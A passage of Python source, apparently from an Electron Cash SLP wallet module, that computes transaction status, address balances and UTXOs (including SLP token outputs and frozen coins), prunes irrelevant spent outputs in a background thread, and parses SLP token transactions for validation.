tx_hash = tx.txid()
if tx.is_complete():
if tx_hash in self.transactions:
label = self.get_label(tx_hash)
height, conf, timestamp = self.get_tx_height(tx_hash)
if height > 0:
if conf:
status = ngettext("{conf} confirmation", "{conf} confirmations", conf).format(conf=conf)
status_enum = self.StatusEnum.Confirmed
else:
status = _('Not verified')
status_enum = self.StatusEnum.NotVerified
else:
status = _('Unconfirmed')
status_enum = self.StatusEnum.Unconfirmed
if fee is None:
fee = self.tx_fees.get(tx_hash)
if fee and self.network and self.network.config.has_fee_estimates():
# NB: this branch will not be taken as has_fee_estimates()
# will always return false since we disabled querying
# the fee histogram as it's useless for BCH anyway.
size = tx.estimated_size()
fee_per_kb = fee * 1000 / size
exp_n = self.network.config.reverse_dynfee(fee_per_kb)
else:
status = _("Signed")
status_enum = self.StatusEnum.Signed
can_broadcast = self.network is not None
else:
s, r = tx.signature_count()
if s == 0:
status = _("Unsigned")
status_enum = self.StatusEnum.Unsigned
else:
status =_('Partially signed') + ' (%d/%d)'%(s,r)
status_enum = self.StatusEnum.PartiallySigned
if is_relevant:
if is_mine:
if fee is not None:
amount = v + fee
else:
amount = v
else:
amount = v
else:
amount = None
if ver == 1:
return self.TxInfo(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n)
assert status_enum is not None
return self.TxInfo2(tx_hash, status, label, can_broadcast, amount, fee, height, conf, timestamp, exp_n,
status_enum)
def get_addr_io(self, address):
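# Returns (received, sent) for this address, both keyed by "prevout_hash:n":
# 'received' maps each txo paid to the address -> (height, value, is_coinbase);
# 'sent' maps each such txo that has been spent -> height of the spending tx.
# e.g. received.get('ab12...90:0') == (630001, 54321, False)  (hypothetical values)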
h = self.get_address_history(address)
received = {}
sent = {}
for tx_hash, height in h:
l = self.txo.get(tx_hash, {}).get(address, [])
for n, v, is_cb in l:
received[tx_hash + ':%d'%n] = (height, v, is_cb)
for tx_hash, height in h:
l = self.txi.get(tx_hash, {}).get(address, [])
for txi, v in l:
sent[txi] = height
return received, sent
def get_slp_token_info(self, tokenid):
with self.lock:
return self.tx_tokinfo[tokenid]
def get_slp_token_baton(self, slpTokenId, cache=True):
with self.lock:
slp_txos = copy.deepcopy(self._slp_txo)
# look for a minting baton
for addr, addrdict in slp_txos.items():
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if txo['qty'] == 'MINT_BATON' and txo['token_id'] == slpTokenId:
try:
coins = self.get_slp_utxos(slpTokenId, domain = [addr], exclude_frozen = False, confirmed_only = False, slp_include_baton=True)
with self.lock:
val = self.tx_tokinfo[txid]['validity']
baton_utxo = [ utxo for utxo in coins if utxo['prevout_hash'] == txid and utxo['prevout_n'] == idx and val == 1][0]
except IndexError:
continue
return baton_utxo
raise SlpNoMintingBatonFound()
# This method is updated for SLP to prevent tokens from being spent
# in normal txn or txns with token_id other than the one specified
def get_addr_utxo(self, address, *, exclude_slp = True):
coins, spent = self.get_addr_io(address)
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
"""
SLP -- removes ALL SLP UTXOs that are either unrelated, or unvalidated
"""
if exclude_slp:
with self.lock:
addrdict = self._slp_txo.get(address,{})
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
coins.pop(txid + ":" + str(idx), None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
x = {
'address':address,
'value':value,
'prevout_n':int(prevout_n),
'prevout_hash':prevout_hash,
'height':tx_height,
'coinbase':is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp
}
out[txo] = x
return out
""" SLP -- keeps ONLY SLP UTXOs that are either unrelated, or unvalidated """
def get_slp_addr_utxo(self, address, slpTokenId, slp_include_invalid=False, slp_include_baton=False, ):
with self.lock:
coins, spent = self.get_addr_io(address)
addrdict = copy.deepcopy(self._slp_txo.get(address,{}))
# removes spent coins
for txi in spent:
coins.pop(txi)
# cleanup/detect if the 'frozen coin' was spent and remove it from the frozen coin set
self.frozen_coins.discard(txi)
self.frozen_coins_tmp.discard(txi)
coins_to_pop = []
for coin in coins.items():
if coin != None:
txid = coin[0].split(":")[0]
idx = coin[0].split(":")[1]
try:
slp_txo = addrdict[txid][int(idx)]
with self.lock:
slp_tx_info = self.tx_tokinfo[txid]
# handle special burning modes
if slp_txo['token_id'] == slpTokenId:
# allow inclusion and possible burning of a valid minting baton
if slp_include_baton and slp_txo['qty'] == "MINT_BATON" and slp_tx_info['validity'] == 1:
continue
# allow inclusion and possible burning of invalid SLP txos
if slp_include_invalid and slp_tx_info['validity'] != 0:
continue
# normally, remove any txos that are not valid for this token ID
if slp_txo['token_id'] != slpTokenId or slp_tx_info['validity'] != 1 or slp_txo['qty'] == "MINT_BATON":
coins_to_pop.append(coin[0])
except KeyError:
coins_to_pop.append(coin[0])
for c in coins_to_pop:
coins.pop(c, None)
out = {}
for txo, v in coins.items():
tx_height, value, is_cb = v
prevout_hash, prevout_n = txo.split(':')
with self.lock:
tok_info = self.tx_tokinfo[prevout_hash]
x = {
'address': address,
'value': value,
'prevout_n': int(prevout_n),
'prevout_hash': prevout_hash,
'height': tx_height,
'coinbase': is_cb,
'is_frozen_coin': txo in self.frozen_coins or txo in self.frozen_coins_tmp,
'token_value': addrdict[prevout_hash][int(prevout_n)]['qty'],
'token_id_hex': tok_info['token_id'],
'token_type': tok_info['type'],
'token_validation_state': tok_info['validity']
}
out[txo] = x
return out
# return the total amount ever received by an address
def get_addr_received(self, address):
received, sent = self.get_addr_io(address)
return sum([v for height, v, is_cb in received.values()])
def get_addr_balance(self, address, exclude_frozen_coins=False):
''' Returns the balance of a bitcoin address as a tuple of:
(confirmed_matured, unconfirmed, unmatured)
Note that 'exclude_frozen_coins = True' only checks for coin-level
freezing, not address-level. '''
assert isinstance(address, Address)
mempoolHeight = self.get_local_height() + 1
if not exclude_frozen_coins: # we do not use the cache when excluding frozen coins as frozen status is a dynamic quantity that can change at any time in the UI
cached = self._addr_bal_cache.get(address)
if cached is not None:
return cached
received, sent = self.get_addr_io(address)
c = u = x = 0
had_cb = False
for txo, (tx_height, v, is_cb) in received.items():
if exclude_frozen_coins and (txo in self.frozen_coins or txo in self.frozen_coins_tmp):
continue
had_cb = had_cb or is_cb # remember if this address has ever seen a coinbase txo
if is_cb and tx_height + COINBASE_MATURITY > mempoolHeight:
x += v
elif tx_height > 0:
c += v
else:
u += v
if txo in sent:
if sent[txo] > 0:
c -= v
else:
u -= v
result = c, u, x
if not exclude_frozen_coins and not had_cb:
# Cache the results.
# Cache needs to be invalidated if a transaction is added to/
# removed from addr history. (See self._addr_bal_cache calls
# related to this littered throughout this file).
#
# Note that as a performance tweak we don't ever cache balances for
# addresses involving coinbase coins. The rationale being as
# follows: Caching of balances of the coinbase addresses involves
# a dynamic quantity: maturity of the coin (which considers the
# ever-changing block height).
#
# There wasn't a good place in this codebase to signal the maturity
# happening (and thus invalidate the cache entry for the exact
# address that holds the coinbase coin in question when a new
# block is found that matures a coinbase coin).
#
# In light of that fact, a possible approach would be to invalidate
# this entire cache when a new block arrives (this is what Electrum
# does). However, for Electron Cash with its focus on many addresses
# for future privacy features such as integrated CashShuffle --
# being notified in the wallet and invalidating the *entire* cache
# whenever a new block arrives (which is the exact time you do
# the most GUI refreshing and calling of this function) seems a bit
# heavy-handed, just for sake of the (relatively rare, for the
# average user) coinbase-carrying addresses.
#
# It's not a huge performance hit for the coinbase addresses to
# simply not cache their results, and have this function recompute
# their balance on each call, when you consider that as a
# consequence of this policy, all the other addresses that are
# non-coinbase can benefit from a cache that stays valid for longer
# than 1 block (so long as their balances haven't changed).
self._addr_bal_cache[address] = result
return result
def get_spendable_coins(self, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', DEFAULT_CONFIRMED_ONLY)
# if (isInvoice):
# confirmed_only = True
return self.get_utxos(domain=domain, exclude_frozen=True, mature=True, confirmed_only=confirmed_only)
def get_slp_spendable_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=True, confirmed_only=confirmed_only)
def get_slp_coins(self, slpTokenId, domain, config, isInvoice = False):
confirmed_only = config.get('confirmed_only', False)
# if (isInvoice):
# confirmed_only = True
return self.get_slp_utxos(slpTokenId, domain=domain, exclude_frozen=False, confirmed_only=confirmed_only)
def get_slp_token_balance(self, slpTokenId, config):
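# Returns a 5-tuple of token amounts (in the token's base units):
# (valid, unvalidated, invalid, unfrozen_valid, frozen_valid), where
# frozen_valid == valid - unfrozen_valid. Validity codes come from
# tx_tokinfo['validity'] (see the branch comments below).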
valid_token_bal = 0
unvalidated_token_bal = 0
invalid_token_bal = 0
unfrozen_valid_token_bal = 0
slp_coins = self.get_slp_coins(slpTokenId, None, config)
for coin in slp_coins:
txid = coin['prevout_hash']
validity = self.tx_tokinfo[txid]['validity']
if validity == 1: # Valid DAG
valid_token_bal += coin['token_value']
if not coin['is_frozen_coin'] and coin['address'] not in self.frozen_addresses:
unfrozen_valid_token_bal += coin['token_value']
elif validity > 1: # Invalid DAG (2=bad slpmessage, 3=inputs lack enough tokens / missing mint baton, 4=change token_type or bad NFT parent)
invalid_token_bal += coin['token_value']
elif validity == 0: # Unknown DAG status (should be in processing queue)
unvalidated_token_bal += coin['token_value']
return (valid_token_bal, unvalidated_token_bal, invalid_token_bal, unfrozen_valid_token_bal, valid_token_bal - unfrozen_valid_token_bal)
def get_utxos(self, domain = None, exclude_frozen = False, mature = False, confirmed_only = False,
*, addr_set_out = None, exclude_slp = True):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
mempoolHeight = self.get_local_height() + 1
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_addr_utxo(addr, exclude_slp=exclude_slp)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
# A note about maturity: Previous versions of Electrum
# and Electron Cash were off by one. Maturity is
# calculated based off mempool height (chain tip height + 1).
# See bitcoind consensus/tx_verify.cpp Consensus::CheckTxInputs
# and also txmempool.cpp CTxMemPool::removeForReorg.
if mature and x['coinbase'] and mempoolHeight - x['height'] < COINBASE_MATURITY:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def get_slp_utxos(self, slpTokenId, domain = None, exclude_frozen = False, confirmed_only = False, slp_include_invalid=False, slp_include_baton=False,
*, addr_set_out = None):
'''Note that exclude_frozen = True checks for BOTH address-level and
coin-level frozen status.
Optional kw-only arg `addr_set_out` specifies a set in which to add all
addresses encountered in the utxos returned. '''
with self.lock:
coins = []
if domain is None:
domain = self.get_addresses()
if exclude_frozen:
domain = set(domain) - self.frozen_addresses
for addr in domain:
utxos = self.get_slp_addr_utxo(addr, slpTokenId, slp_include_invalid=slp_include_invalid, slp_include_baton=slp_include_baton)
len_before = len(coins)
for x in utxos.values():
if exclude_frozen and x['is_frozen_coin']:
continue
if confirmed_only and x['height'] <= 0:
continue
coins.append(x)
if addr_set_out is not None and len(coins) > len_before:
# add this address to the address set if it has results
addr_set_out.add(addr)
return coins
def dummy_address(self):
return self.get_receiving_addresses()[0]
def get_addresses(self):
return self.get_receiving_addresses() + self.get_change_addresses()
def get_frozen_balance(self):
if not self.frozen_coins and not self.frozen_coins_tmp:
# performance short-cut -- get the balance of the frozen address set only IFF we don't have any frozen coins
return self.get_balance(self.frozen_addresses)
# otherwise, do this more costly calculation...
cc_no_f, uu_no_f, xx_no_f = self.get_balance(None, exclude_frozen_coins = True, exclude_frozen_addresses = True)
cc_all, uu_all, xx_all = self.get_balance(None, exclude_frozen_coins = False, exclude_frozen_addresses = False)
return (cc_all-cc_no_f), (uu_all-uu_no_f), (xx_all-xx_no_f)
def get_slp_locked_balance(self):
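# Returns the total BCH amount (in satoshis) currently sitting on unspent
# SLP token outputs, i.e. value that normal (non-SLP) coin selection will
# not touch.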
bch = 0
with self.lock:
for addr, addrdict in self._slp_txo.items():
_, spent = self.get_addr_io(addr)
for txid, txdict in addrdict.items():
for idx, txo in txdict.items():
if (txid + ":" + str(idx)) in spent:
continue
try:
for i, a, _ in self.txo[txid][addr]:
if i == idx:
bch+=a
except KeyError:
pass
return bch
def get_balance(self, domain=None, exclude_frozen_coins=False, exclude_frozen_addresses=False):
if domain is None:
domain = self.get_addresses()
if exclude_frozen_addresses:
domain = set(domain) - self.frozen_addresses
cc = uu = xx = 0
for addr in domain:
c, u, x = self.get_addr_balance(addr, exclude_frozen_coins)
cc += c
uu += u
xx += x
return cc, uu, xx
def get_address_history(self, address):
assert isinstance(address, Address)
return self._history.get(address, [])
def _clean_pruned_txo_thread(self):
''' Runs in the thread self.pruned_txo_cleaner_thread which is only
active if self.network. Cleans the self.pruned_txo dict and the
self.pruned_txo_values set of spends that are not relevant to the
wallet. The processing below is needed because as of 9/16/2019, Electron
Cash temporarily puts all spends that pass through add_transaction and
have an unparseable address (txi['address'] is None) into the dict
self.pruned_txo. This is necessary for handling tx's with esoteric p2sh
scriptSigs and detecting balance changes properly for txins
containing such scriptSigs. See #895. '''
def deser(ser):
prevout_hash, prevout_n = ser.split(':')
prevout_n = int(prevout_n)
return prevout_hash, prevout_n
def mkser(prevout_hash, prevout_n):
return f'{prevout_hash}:{prevout_n}'
def rm(ser, pruned_too=True, *, tup = None):
h, n = tup or deser(ser) # tup arg is for performance when caller already knows the info (avoid a redundant .split on ':')
s = txid_n[h]
s.discard(n)
if not s:
txid_n.pop(h, None)
if pruned_too:
with self.lock:
tx_hash = self.pruned_txo.pop(ser, None)
self.pruned_txo_values.discard(tx_hash)
def add(ser):
prevout_hash, prevout_n = deser(ser)
txid_n[prevout_hash].add(prevout_n)
def keep_running():
return bool(self.network and self.pruned_txo_cleaner_thread is me)
def can_do_work():
return bool(txid_n and self.is_up_to_date())
debug = False # set this to true here to get more verbose output
me = threading.current_thread()
q = me.q
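# Queue protocol (fed from put_pruned_txo/pop_pruned_txo in add_transaction):
# a plain "txid:n" string asks this thread to track that outpoint, an
# "r_"-prefixed string asks it to stop tracking it, and None requests shutdown.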
me.txid_n = txid_n = defaultdict(set) # dict of prevout_hash -> set of prevout_n (int)
last = time.time()
try:
self.print_error(f"{me.name}: thread started")
with self.lock:
# Setup -- grab whatever was already in pruned_txo at thread
# start
for ser in self.pruned_txo:
h, n = deser(ser)
txid_n[h].add(n)
while keep_running():
try:
ser = q.get(timeout=5.0 if can_do_work() else 20.0)
if ser is None:
# quit thread
return
if ser.startswith('r_'):
# remove requested
rm(ser[2:], False)
else:
# ser was added
add(ser)
del ser
except queue.Empty:
pass
if not can_do_work():
continue
t0 = time.time()
if t0 - last < 1.0: # run no more often than once per second
continue
last = t0
defunct_ct = 0
for prevout_hash, s in txid_n.copy().items():
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
with self.lock:
defunct = ser not in self.pruned_txo
if defunct:
#self.print_error(f"{me.name}: skipping already-cleaned", ser)
rm(ser, False, tup=(prevout_hash, prevout_n))
defunct_ct += 1
continue
if defunct_ct and debug:
self.print_error(f"{me.name}: DEBUG", defunct_ct, "defunct txos removed in", time.time()-t0, "secs")
ct = 0
for prevout_hash, s in txid_n.copy().items():
try:
with self.lock:
tx = self.transactions.get(prevout_hash)
if tx is None:
tx = Transaction.tx_cache_get(prevout_hash)
if isinstance(tx, Transaction):
tx = Transaction(tx.raw) # take a copy
else:
if debug: self.print_error(f"{me.name}: DEBUG retrieving txid", prevout_hash, "...")
t1 = time.time()
tx = Transaction(self.network.synchronous_get(('blockchain.transaction.get', [prevout_hash])))
if debug: self.print_error(f"{me.name}: DEBUG network retrieve took", time.time()-t1, "secs")
# Paranoia; intended side effect of the below assert
# is to also deserialize the tx (by calling the slow
# .txid()) which ensures the tx from the server
# is not junk.
assert prevout_hash == tx.txid(), "txid mismatch"
Transaction.tx_cache_put(tx, prevout_hash) # will cache a copy
except Exception as e:
self.print_error(f"{me.name}: Error retrieving txid", prevout_hash, ":", repr(e))
if not keep_running(): # in case we got a network timeout *and* the wallet was closed
return
continue
if not keep_running():
return
for prevout_n in s.copy():
ser = mkser(prevout_hash, prevout_n)
try:
txo = tx.outputs()[prevout_n]
except IndexError:
self.print_error(f"{me.name}: ERROR -- could not find output", ser)
rm(ser, True, tup=(prevout_hash, prevout_n))
continue
_typ, addr, v = txo
rm_pruned_too = False
with self.lock:
mine = self.is_mine(addr)
if not mine and ser in self.pruned_txo:
ct += 1
rm_pruned_too = True
rm(ser, rm_pruned_too, tup=(prevout_hash, prevout_n))
if rm_pruned_too and debug:
self.print_error(f"{me.name}: DEBUG removed", ser)
if ct:
with self.lock:
# Save changes to storage -- this is cheap and doesn't
# actually write to file yet, just flags storage as
# 'dirty' for when wallet.storage.write() is called
# later.
self.storage.put('pruned_txo', self.pruned_txo)
self.print_error(f"{me.name}: removed", ct,
"(non-relevant) pruned_txo's in",
f'{time.time()-t0:3.2f}', "seconds")
except:
import traceback
self.print_error(f"{me.name}:", traceback.format_exc())
raise
finally:
self.print_error(f"{me.name}: thread exiting")
def add_transaction(self, tx_hash, tx):
if not tx.inputs():
# bad tx came in off the wire -- all 0's or something, see #987
self.print_error("add_transaction: WARNING a tx came in from the network with 0 inputs!"
" Bad server? Ignoring tx:", tx_hash)
return
is_coinbase = tx.inputs()[0]['type'] == 'coinbase'
with self.lock:
# HELPER FUNCTIONS
def add_to_self_txi(tx_hash, addr, ser, v):
''' addr must be 'is_mine' '''
d = self.txi.get(tx_hash)
if d is None:
self.txi[tx_hash] = d = {}
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((ser, v))
def find_in_self_txo(prevout_hash: str, prevout_n: int) -> tuple:
"""Returns a tuple of the (Address,value) for a given
prevout_hash:prevout_n, or (None, None) if not found. If valid
return, the Address object is found by scanning self.txo. The
lookup below is relatively fast in practice even on pathological
wallets."""
dd = self.txo.get(prevout_hash, {})
for addr2, item in dd.items():
for n, v, is_cb in item:
if n == prevout_n:
return addr2, v
return (None, None)
def txin_get_info(txi):
prevout_hash = txi['prevout_hash']
prevout_n = txi['prevout_n']
ser = f'{prevout_hash}:{prevout_n}'
return prevout_hash, prevout_n, ser
def put_pruned_txo(ser, tx_hash):
self.pruned_txo[ser] = tx_hash
self.pruned_txo_values.add(tx_hash)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put(ser)
def pop_pruned_txo(ser):
next_tx = self.pruned_txo.pop(ser, None)
if next_tx:
self.pruned_txo_values.discard(next_tx)
t = self.pruned_txo_cleaner_thread
if t and t.q: t.q.put('r_' + ser) # notify of removal
return next_tx
# /HELPER FUNCTIONS
# add inputs
self.txi[tx_hash] = d = {}
for txi in tx.inputs():
if txi['type'] == 'coinbase':
continue
addr = txi.get('address')
# find value from prev output
if self.is_mine(addr):
prevout_hash, prevout_n, ser = txin_get_info(txi)
dd = self.txo.get(prevout_hash, {})
for n, v, is_cb in dd.get(addr, []):
if n == prevout_n:
add_to_self_txi(tx_hash, addr, ser, v)
break
else:
# Coin's spend tx came in before its receive tx: flag
# the spend for when the receive tx will arrive into
# this function later.
put_pruned_txo(ser, tx_hash)
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
del dd, prevout_hash, prevout_n, ser
elif addr is None:
# Unknown/unparsed address.. may be a strange p2sh scriptSig
# Try and find it in txout's if it's one of ours.
# See issue #895.
prevout_hash, prevout_n, ser = txin_get_info(txi)
# Find address in self.txo for this prevout_hash:prevout_n
addr2, v = find_in_self_txo(prevout_hash, prevout_n)
if addr2 is not None and self.is_mine(addr2):
add_to_self_txi(tx_hash, addr2, ser, v)
self._addr_bal_cache.pop(addr2, None) # invalidate cache entry
else:
# Not found in self.txo. It may still be one of ours
# however since tx's can come in out of order due to
# CTOR, etc, and self.txo may not have it yet. So we
# flag the spend now, and when the out-of-order prevout
# tx comes in later for this input (if it's indeed one
# of ours), the real address for this input will get
# picked up then in the "add outputs" section below in
# this function. At that point, self.txi will be
# properly updated to indicate the coin in question was
# spent via an add_to_self_txi call.
#
# If it's *not* one of ours, however, the below will
# grow pruned_txo with an irrelevant entry. However, the
# irrelevant entry will eventually be reaped and removed
# by the self.pruned_txo_cleaner_thread which runs
# periodically in the background.
put_pruned_txo(ser, tx_hash)
del addr2, v, prevout_hash, prevout_n, ser
# don't keep empty entries in self.txi
if not d:
self.txi.pop(tx_hash, None)
# add outputs
self.txo[tx_hash] = d = {}
op_return_ct = 0
deferred_cashacct_add = None
for n, txo in enumerate(tx.outputs()):
ser = tx_hash + ':%d'%n
_type, addr, v = txo
mine = False
if isinstance(addr, ScriptOutput):
if addr.is_opreturn():
op_return_ct += 1
if isinstance(addr, cashacct.ScriptOutput):
# auto-detect CashAccount registrations we see,
# and notify cashacct subsystem of that fact. But we
# can only do it after making sure it's the *only*
# OP_RETURN in the tx.
deferred_cashacct_add = (
lambda _tx_hash=tx_hash, _tx=tx, _n=n, _addr=addr:
self.cashacct.add_transaction_hook(_tx_hash, _tx, _n, _addr)
)
elif self.is_mine(addr):
# add coin to self.txo since it's mine.
mine = True
l = d.get(addr)
if l is None:
d[addr] = l = []
l.append((n, v, is_coinbase))
del l
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
# give v to txi that spends me
next_tx = pop_pruned_txo(ser)
if next_tx is not None and mine:
add_to_self_txi(next_tx, addr, ser, v)
# don't keep empty entries in self.txo
if not d:
self.txo.pop(tx_hash, None)
# save
self.transactions[tx_hash] = tx
# Invoke the cashacct add hook (if defined) here at the end, with
# the lock held. We accept the cashacct.ScriptOutput only iff
# op_return_ct == 1 as per the Cash Accounts spec.
# See: https://gitlab.com/cash-accounts/lookup-server/blob/master/routes/parser.js#L253
if op_return_ct == 1 and deferred_cashacct_add:
deferred_cashacct_add()
### SLP: Handle incoming SLP transaction outputs here
self.handleSlpTransaction(tx_hash, tx)
"""
Callers are expected to take lock(s). We take no locks
"""
def handleSlpTransaction(self, tx_hash, tx):
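# Parse a (potential) SLP OP_RETURN in output 0: records any of our outputs
# carrying tokens into self._slp_txo[address][tx_hash][vout] =
# {'type', 'token_id', 'qty'}, adds unseen token ids to self.token_types,
# and stores per-tx metadata in self.tx_tokinfo (validity starts at 0 = unknown).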
txouts = tx.outputs()
try:
slpMsg = SlpMessage.parseSlpOutputScript(txouts[0][1])
except SlpUnsupportedSlpTokenType as e:
token_type = 'SLP%d'%(e.args[0],)
for i, (_type, addr, _) in enumerate(txouts):
if _type == TYPE_ADDRESS and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': token_type,
'qty': None,
'token_id': None,
}
return
except (SlpParsingError, IndexError, OpreturnError):
return
if slpMsg.transaction_type == 'SEND':
token_id_hex = slpMsg.op_return_fields['token_id_hex']
# truncate outputs list
amounts = slpMsg.op_return_fields['token_output'][:len(txouts)]
for i, qty in enumerate(amounts):
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS and qty > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': qty,
}
elif slpMsg.transaction_type == 'GENESIS':
token_id_hex = tx_hash
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['initial_token_mint_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['initial_token_mint_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == "MINT":
token_id_hex = slpMsg.op_return_fields['token_id_hex']
try:
_type, addr, _ = txouts[1]
if _type == TYPE_ADDRESS:
if slpMsg.op_return_fields['additional_token_quantity'] > 0 and self.is_mine(addr):
self._slp_txo[addr][tx_hash][1] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': slpMsg.op_return_fields['additional_token_quantity'],
}
if slpMsg.op_return_fields['mint_baton_vout'] is not None:
i = slpMsg.op_return_fields['mint_baton_vout']
_type, addr, _ = txouts[i]
if _type == TYPE_ADDRESS:
self._slp_txo[addr][tx_hash][i] = {
'type': 'SLP%d'%(slpMsg.token_type,),
'token_id': token_id_hex,
'qty': 'MINT_BATON',
}
except IndexError: # if too few outputs (compared to mint_baton_vout)
pass
elif slpMsg.transaction_type == 'COMMIT':
# ignore COMMs, they aren't producing any tokens.
return
else:
raise RuntimeError(slpMsg.transaction_type)
# On receiving a new SEND, MINT, or GENESIS always add entry to token_types if wallet hasn't seen tokenId yet
if slpMsg.transaction_type in [ 'SEND', 'MINT', 'GENESIS' ]:
if slpMsg.transaction_type == 'GENESIS':
tokenid = tx_hash
else:
tokenid = slpMsg.op_return_fields['token_id_hex']
new_token = True
for k, v in self.tx_tokinfo.items():
try:
if v['token_id'] == tokenid:
new_token = False
except KeyError:
pass
if new_token and tokenid not in self.token_types:
tty = { 'class': 'SLP%d'%(slpMsg.token_type,),
'decimals': "?",
'name': 'unknown-' + tokenid[:6]
}
if slpMsg.token_type == 65:
tty['group_id'] = "?"
self.token_types[tokenid] = tty
# Always add entry to tx_tokinfo
tti = { 'type':'SLP%d'%(slpMsg.token_type,),
'transaction_type':slpMsg.transaction_type,
'token_id': token_id_hex,
'validity': 0,
}
self.tx_tokinfo[tx_hash] = tti
if self.is_slp: # Only start up validation if SLP enabled
self.slp_check_validation(tx_hash, tx)
def revalidate(self, tx_hash, tx):
tti = self.tx_tokinfo[tx_hash]
tti['validity'] = 0
self.slp_check_validation(tx_hash, tx)
slp_gs_mgr.slp_validity_signal.emit(tx_hash, tti['validity'])
def slp_check_validation(self, tx_hash, tx):
""" Callers are expected to take lock(s). We take no locks """
tti = self.tx_tokinfo[tx_hash]
try:
is_new = self.token_types[tti['token_id']]['decimals'] == '?'
except:
is_new = False
if tti['validity'] == 0 and tti['token_id'] in self.token_types and not is_new and tti['type'] in ['SLP1','SLP65','SLP129']:
def callback(job):
if slp_gs_mgr.slp_validity_signal == None:
return
(txid,node), = job.nodes.items()
val = node.validity
tti['validity'] = val
slp_gs_mgr.slp_validity_signal.emit(txid, val)
if slp_gs_mgr.slpdb_validation_enabled:
try:
result = slp_slpdb_validator.check_validity(tx_hash)
if result >= slp_gs_mgr.slpdb_confirmations:
tti['validity'] = 1
return
else:
tti['validity'] = 2
return
except Exception as e:
raise Exception(f"Exception: {str(e)}")
if tti['type'] in ['SLP1']:
job = self.slp_graph_0x01.make_job(tx, self, self.network,
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
elif tti['type'] in ['SLP65', 'SLP129']:
job = self.slp_graph_0x01_nft.make_job(tx, self, self.network, nft_type=tti['type'],
debug=2 if is_verbose else 1, # set debug=2 here to see the verbose dag when running with -v
reset=False)
if job is not None:
job.add_callback(callback)
# This was commented out because it spammed the log so badly
# it impacted performance. SLP validation can create a *lot* of jobs!
#finalization_print_error(job, f"[{self.basename()}] Job for {tx_hash} type {tti['type']} finalized")
def rebuild_slp(self,):
"""Wipe away old SLP transaction data and rerun on the entire tx set.
"""
with self.lock:
self._slp_txo = defaultdict(lambda: defaultdict(dict))
self.tx_tokinfo = {}
for txid, tx in self.transactions.items():
self.handleSlpTransaction(txid, tx)
def remove_transaction(self, tx_hash):
with self.lock:
self.print_error("removing tx from history", tx_hash)
# Note that we don't actually remove the tx_hash from
# self.transactions, but instead rely on the unreferenced tx being
# removed the next time the wallet is loaded in self.load_transactions()
for ser, hh in list(self.pruned_txo.items()):
if hh == tx_hash:
self.pruned_txo.pop(ser)
self.pruned_txo_values.discard(hh)
# add tx to pruned_txo, and undo the txi addition
for next_tx, dd in self.txi.items():
for addr, l in list(dd.items()):
ll = l[:]
for item in ll:
ser, v = item
prev_hash, prev_n = ser.split(':')
if prev_hash == tx_hash:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
l.remove(item)
self.pruned_txo[ser] = next_tx
self.pruned_txo_values.add(next_tx)
if l == []:
dd.pop(addr)
else:
dd[addr] = l
# invalidate addr_bal_cache for outputs involving this tx
d = self.txo.get(tx_hash, {})
for addr in d:
self._addr_bal_cache.pop(addr, None) # invalidate cache entry
self.txi.pop(tx_hash, None)
self.txo.pop(tx_hash, None)
self.tx_fees.pop(tx_hash, None)
self.tx_tokinfo[tx_hash] = {}
for addr, addrdict in self._slp_txo.items():
if tx_hash in addrdict: addrdict[tx_hash] = {}
# do this with the lock held
self.cashacct.remove_transaction_hook(tx_hash)
def receive_tx_callback(self, tx_hash, tx, tx_height):
self.add_transaction(tx_hash, tx)
self.add_unverified_tx(tx_hash, tx_height)
def receive_history_callback(self, addr, hist, tx_fees):
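# Reconcile a freshly received history for 'addr' (a list of (tx_hash, height)
# pairs) with what we previously stored: forget txs no address references any
# more, register new/updated ones as unverified, and record reported fees.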
with self.lock:
old_hist = self.get_address_history(addr)
for tx_hash, height in old_hist:
if (tx_hash, height) not in hist:
s = self.tx_addr_hist.get(tx_hash)
if s:
